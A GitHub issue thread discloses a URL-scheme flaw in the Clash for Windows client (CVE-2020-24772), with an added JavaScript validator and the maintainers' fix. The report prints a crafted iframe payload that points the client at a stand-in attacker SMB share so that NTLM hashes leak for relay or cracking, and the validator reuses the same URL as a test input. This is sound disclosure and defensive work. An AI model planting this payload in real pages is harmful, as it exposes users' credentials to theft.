
[Clash for Windows] URL Scheme security issue #910

Closed
burpheart opened this issue Aug 20, 2020 · 6 comments
Labels
not related Not related to this project

Comments

@burpheart (Author) commented Aug 20, 2020

Environment

OS: Windows

Description

This vulnerability is similar to the TeamViewer CVE-2020-13699 vulnerability.
An attacker could embed a malicious iframe in a website with a crafted URL
(<iframe src='clash://install-config?url=\\attacker\2131'></iframe>)
that would launch the Clash Windows client and force it to
open a remote SMB share. Windows will perform NTLM authentication when
opening the SMB share, and that request can be relayed (using a tool like
Responder) for code execution (or captured for hash cracking).

Possible Solution

Limit configuration-file fetching to http or https.

More Information

This vulnerability is similar to TeamViewer's CVE-2020-13699: https://cert.360.cn/warning/detail?id=d31cb7d9342a5ab0973ab2e5e28ddd84
An attacker can use a carefully crafted iframe to launch the Clash application, for example (<iframe src='clash://install-config?url=\\attacker\2131'></iframe>),
and make it access an SMB server of the attacker's choosing.
When Clash contacts the attacker's SMB server to fetch the configuration file,
Windows performs NTLM authentication and sends the NTLM hash to the attacker's server.
The attacker can then use the NTLM hash for operations such as cracking the user's password.
This vulnerability has a certain degree of severity.
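The check the report proposes (accept only http/https configuration URLs), written out as an added example; this is not Clash for Windows' own code and does not reproduce how the client actually parses its scheme. The `clash://install-config?url=...` scheme and the crafted `\\attacker\2131` value come from the issue; the function names, the `ALLOWED_SCHEMES` set and the benign sample URL are assumptions for this example. The point it shows is that a UNC path has no URL scheme at all, so an absolute-URL parse plus a scheme allow-list rejects it before any fetch (and therefore before any SMB connection and NTLM exchange) can happen:

```javascript
// Added example, not project code: validating the `url` parameter of a
// custom URL scheme before fetching anything with it.

// Only these schemes may be used to retrieve a configuration file
// (assumption for this example; the issue asks for http or https).
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Parse the custom-scheme URL the OS hands to the app when a page (for
// example an <iframe src="clash://...">) triggers the handler.
// Returns null for anything that is not a clash: URL.
function parseSchemeUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch {
    return null;
  }
  if (u.protocol !== 'clash:') return null;
  // For a non-special scheme the WHATWG parser puts "install-config" in
  // hostname; fall back to the path for a clash:/install-config form.
  const action = u.hostname || u.pathname.replace(/^\/+/, '');
  return { action, params: u.searchParams };
}

// Decide whether a configuration URL may be fetched. Only absolute
// http(s) URLs pass. A UNC path (\\host\share) or a bare path has no
// scheme and fails to parse; file:, smb: and similar parse but are not
// in the allow-list. Each rejection carries a reason for logging.
function validateConfigUrl(value) {
  if (typeof value !== 'string' || value.length === 0) {
    return { ok: false, reason: 'missing url parameter' };
  }
  let target;
  try {
    target = new URL(value);
  } catch {
    return { ok: false, reason: 'not an absolute URL' };
  }
  if (!ALLOWED_SCHEMES.has(target.protocol)) {
    return { ok: false, reason: `scheme ${target.protocol} not allowed` };
  }
  if (target.username || target.password) {
    return { ok: false, reason: 'credentials in URL not allowed' };
  }
  return { ok: true, url: target.href };
}

// Scheme-handler entry point: returns what the app should do with the
// incoming URL instead of acting on it directly.
function handleSchemeUrl(raw) {
  const parsed = parseSchemeUrl(raw);
  if (!parsed) return { action: 'ignore', reason: 'not a clash: URL' };
  if (parsed.action !== 'install-config') {
    return { action: 'ignore', reason: `unknown action ${parsed.action}` };
  }
  const check = validateConfigUrl(parsed.params.get('url'));
  if (!check.ok) return { action: 'reject', reason: check.reason };
  return { action: 'fetch', url: check.url };
}

// Constructed inputs: the crafted URL from the issue (backslashes escaped
// for the JS string literal) and a benign one with an assumed host.
const crafted = 'clash://install-config?url=\\\\attacker\\2131';
const benign = 'clash://install-config?url=https://example.com/config.yaml';

console.log(handleSchemeUrl(crafted)); // action: 'reject'
console.log(handleSchemeUrl(benign));  // action: 'fetch'
```

Note that this only closes the SMB/NTLM vector: any web page can still silently launch the client through the registered scheme, so the handler should also avoid doing anything irreversible (such as replacing the active configuration) without a user confirmation.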

@Dreamacro Dreamacro added the not related Not related to this project label Aug 20, 2020
@Dreamacro (Owner)

@Fndroid

@Dreamacro Dreamacro changed the title [Bug]URL Scheme security issue [Clash for Windows] URL Scheme security issue Aug 20, 2020
@Fndroid (Contributor) commented Aug 20, 2020

@burpheart An HTTP protocol limit will be added in the next release. Thank you for the report.

@Dreamacro (Owner)

Clash for Windows fixed it.

@burpheart (Author) commented Mar 16, 2022

affected product: Clash for Windows
affected version: v0.11.4
fixed version: v0.11.5
CVE ID: CVE-2020-24772
impact: An attacker could embed a malicious iframe in a website with a crafted URL that would launch the Clash Windows client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share, and that request can be relayed.
reference: #910
description: An attacker could embed a malicious iframe in a website with a crafted URL that would launch the Clash Windows client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share, and that request can be relayed (using a tool like Responder) for code execution (or captured for hash cracking).

@kamikredstone

Hey @burpheart and @Dreamacro!
I noticed that both the version the PoC was conducted on and the fixed version don't correspond to the tags in this repository.
Is there some other versioning used?

@burpheart (Author)

> Hey @burpheart and @Dreamacro! I noticed that both the version the PoC was conducted on and the fixed version don't correspond to the tags in this repository. Is there some other versioning used?

@kamikredstone
https://github.com/Fndroid/clash_for_windows_pkg/releases/tag/0.11.4
